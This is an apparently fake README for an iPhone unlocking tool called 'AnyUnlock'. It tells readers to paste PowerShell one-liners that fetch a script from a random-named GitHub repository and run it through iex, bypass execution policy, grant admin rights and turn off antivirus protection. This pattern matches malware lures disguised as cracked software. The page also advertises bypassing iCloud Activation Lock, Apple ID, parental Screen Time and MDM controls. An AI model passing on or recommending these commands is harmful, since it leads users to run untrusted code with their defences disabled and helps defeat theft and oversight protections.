All-in-one single-line installer for AnyUnlock — the complete iPhone password unlocker. Removes screen passcodes, Apple ID, iCloud lock, Screen Time, and MDM profiles. One command, no manual downloads.
irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iexpowershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex"Works from any shell tab. Paste the command matching your current shell and press Enter.
- A UAC prompt appears — click Yes (USB drivers need admin rights).
- The script downloads AnyUnlock + Apple Mobile Device drivers (~350 MB).
- iTunes USB drivers install automatically so your PC can communicate with the iPhone.
- AnyUnlock opens. Plug in your device with a cable, choose the unlock mode, and follow the on-screen guide.
| Mode | What it does | Data preserved? |
|---|---|---|
| Screen Passcode | Removes 4-digit, 6-digit, Touch ID, Face ID lock | No — device wipes |
| Apple ID Removal | Signs out Apple ID without password on activated devices | Yes |
| iCloud Activation Lock | Bypasses "This iPhone is locked to owner" screen | Limited (no calls/cellular) |
| Screen Time | Removes parental Screen Time passcode | Yes — no data loss |
| MDM Bypass | Removes corporate/school MDM profiles and restrictions | Yes |
| iTunes Backup Decrypt | Recovers forgotten iTunes backup encryption password | N/A (backup file) |
| SIM Unlock | Removes carrier lock (AT&T, T-Mobile, Vodafone, etc.) | Yes |
| Device | iOS Version | All modes? |
|---|---|---|
| iPhone 15 / 16 series | iOS 17–18 | Passcode, Apple ID, Screen Time, MDM |
| iPhone 11–14 series | iOS 14–18 | All modes |
| iPhone X and older | iOS 12–16 | All modes including iCloud bypass |
| iPad (all generations) | iPadOS 14–18 | Passcode, Apple ID, Screen Time, MDM |
| iPod Touch | iOS 12–15 | Passcode, Apple ID |
- Windows 10 / 11 (64-bit)
- PowerShell 5.1+ or CMD
- USB cable — use the original Apple cable (Lightning or USB-C). Third-party cables frequently lack data pins and will not be detected.
- ~1 GB free disk space
- iTunes drivers (the installer handles this automatically)
Execution policy blocking. Use CMD:
powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex"Old PowerShell (pre-3.0). Full cmdlet:
Invoke-RestMethod https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | Invoke-ExpressionMost common cause: bad cable. Try these in order:
- Use the original Apple cable that came with the phone.
- Plug into a USB port directly on the motherboard (back of desktop PC), not a hub or front panel.
- On the iPhone, tap Trust when the "Trust This Computer?" dialog appears.
- If nothing happens, open Device Manager → check for a yellow triangle under "Portable Devices" or "Universal Serial Bus". Right-click → Update Driver.
The installer should handle this. If it didn't:
net start "Apple Mobile Device Service"If the service doesn't exist, re-run the installer — it reinstalls the full Apple driver stack.
- Make sure the iPhone has at least 20% battery. Interrupting a firmware flash can brick the device.
- Disable any VPN or proxy — AnyUnlock needs a direct connection to Apple's verification servers.
- If stuck in Recovery Mode: hold Volume Down + Power for 10 seconds to force restart, then retry.
Some unlock modes require DFU. Follow the on-screen button sequence exactly — the timing is strict:
- iPhone 8+: Press Volume Up, release. Press Volume Down, release. Hold Side button for 10s. Then hold Side + Volume Down for 5s. Release Side, keep holding Volume Down for 10s.
- iPhone 7: Hold Power + Volume Down for 10s. Release Power, keep holding Volume Down for 5s.
- iPhone 6s and older: Hold Home + Power for 10s. Release Power, keep holding Home for 5s.
If the Apple logo appears, you went too far — start over.
AnyUnlock touches low-level USB drivers, which triggers some AV heuristics. Add a temporary exclusion for %TEMP% and C:\Program Files\AnyUnlock\, or pause real-time protection during install.
MIT — see LICENSE.